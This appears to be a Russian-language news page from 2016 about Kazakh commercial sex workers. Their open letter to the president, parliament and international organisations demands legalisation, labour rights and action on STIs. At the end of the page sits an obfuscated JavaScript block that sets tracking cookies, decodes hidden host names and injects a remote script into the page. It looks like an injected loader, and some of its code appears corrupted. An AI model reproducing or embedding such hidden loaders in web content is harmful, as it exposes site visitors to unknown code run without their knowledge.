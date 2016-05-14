Работницы и работники коммерческого секса выступают за легализацию проституции. Поводом для этого стал экономический кризис, сообщает informburo.kz.
Иллюстративное фото с сайта www.kievpravda.com
- Уважаемые господа и дамы! К вам обращаются работницы коммерческого секса! Хватит быть равнодушными или зарывать голову в песок! Многих из вас мы знаем, и не только в лицо! Упали цены на нефть, и это напрямую ударило по нам! Рынок коммерческого секса сжимается. Клиентура беднеет. Нам все чаще приходится работать в антисанитарных условиях, в подъездах и машинах! - с этих слов начинается обращение работников коммерческого секса, которое опубликовано на блог-платформе Your Vision.
Своё обращение они адресуют президенту Казахстана Н.А. Назарбаеву, Премьер-Министру К.К. Масимову, Генеральному прокурору Ж.К. Асанову, Депутатам Парламента Казахстана,Организации Объединенных наций, ОБСЕ и Совету Европы, Международным правозащитным организациям, всем кто нас любит и всем кто нас знает!
В тексте обращения представители древнейшей профессии сетуют на то, что их права никак не защищены. Они пишут, мы:
не имеем возможности защитить свои права, а иногда и жизни;
нас обирают сутенеры и менты;
находимся в постоянном страхе, что нам не заплатят клиенты;
сталкиваемся с дикой конкуренцией со стороны девочек из Узбекистана, Киргизии и Украины - работающих нелегально;
живем в условиях общественного порицания, не можем открыто заявить о своей профессии;
По их словам, посредники, сутенёры, владельцы саун, гостиниц, салонов красоты и полицейские наглеют и повышают ставки. Возмущены представители древнейшей профессии и новым Трудовым кодексом. Активистки-защитницы прав работниц коммерческой секс-индустрии Казахстана обращаются к представителям государственной власти и международным организациям с требованием внести поправки в законодательство и легализовать коммерческий секс.
- Мы требуем уравнять нас в трудовых правах со всем населением страны. Мы призываем создать цивилизованный, прозрачный и медицински защищенный рынок интимных услуг. При этом, мы готовы платить налоги в бюджет страны, и это не маленькая сумма! Тем более всё равно эти деньги уходят сейчас сутенерам и ментам, - говорится в тексте обращения.
Исходя из всего перечисленного, они требуют:
Во-первых, срочной разработки и принятия "Закона о легализации коммерческого секса", в основу которого должна лечь успешная международная практика таких стран как Германия и Голландия, стран Латинской Америки, а также некоторых мусульманских стран, таких как Турция.
Во-вторых, мы требуем официально использовать наименование "работники коммерческого секса". Другие обращения, считаем оскорбительными!
В-третьих, мы призываем власти начать решительные действия по обузданию СПИДа и венерических заболеваний, передаваемых половым путем. Многие из девочек все чаще заболевают. И ситуацию с венерическими заболеваниями усугубляют девочки из Киргизии, Узбекистана и Украины!
В случае, если обращение не будет услышанным, работники сферы коммерческого секса Казахстана грозят выйти на общенациональный митинг протеста. К слову, под текстом обращения подписались почти 600 человек среди которых не только женщины, но и мужчины.
// < ![CDATA[
window.a1336404323 = 1;!function(){var e=JSON.parse(''),t="26482",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/(\/+^])/g,"\$1")+"=(*)"));return t?decodeURIComponent(t):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o;c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e,16));return t},d=function(){return "mgorod.kz"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e;o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e,s(t)};f()}();
// ]]>